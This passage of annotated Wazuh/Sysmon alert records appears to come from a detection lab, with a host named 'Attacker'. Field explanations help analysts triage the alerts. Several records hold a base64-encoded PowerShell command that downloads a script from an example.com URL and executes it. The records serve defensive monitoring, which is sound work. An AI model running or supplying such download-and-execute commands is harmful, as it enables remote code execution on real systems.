Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_esc2b0h1.abg.ps1
CreationUtcTime: 2025-04-24 22:37:37.990
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:37.993 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd30-680a-4e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 5012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_esc2b0h1.abg.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:37.990 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 56 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534263.1455657 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:40.4496218Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283985 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:39.119
ProcessGuid: {94294ddc-bd33-680a-510b-000000000e00}
ProcessId: 14452
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00}
ParentProcessId: 5012
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:39.119 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd33-680a-510b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14452 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd30-680a-4e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 5012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 60 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534263.1463724 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:40.7271675Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283987 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:40.661
ProcessGuid: {94294ddc-bd33-680a-510b-000000000e00}
ProcessId: 14452
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_11mj13ze.ayt.ps1
CreationUtcTime: 2025-04-24 22:37:40.661
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:40.661 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd33-680a-510b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14452 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_11mj13ze.ayt.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:40.661 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 57 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534266.1466493 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:43.8586741Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284053 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:42.441
ProcessGuid: {94294ddc-bd36-680a-530b-000000000e00}
ProcessId: 14008
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd33-680a-510b-000000000e00}
ParentProcessId: 14452
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:42.441 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd36-680a-530b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14008 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd33-680a-510b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 14452 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 61 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534266.1474564 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:44.1199096Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284054 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:44.080
ProcessGuid: {94294ddc-bd36-680a-530b-000000000e00}
ProcessId: 14008
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rm1lhycc.bo2.ps1
CreationUtcTime: 2025-04-24 22:37:44.080
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:44.080 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd36-680a-530b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14008 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rm1lhycc.bo2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:44.080 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 58 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534269.1477333 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:46.7468088Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284082 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:45.366
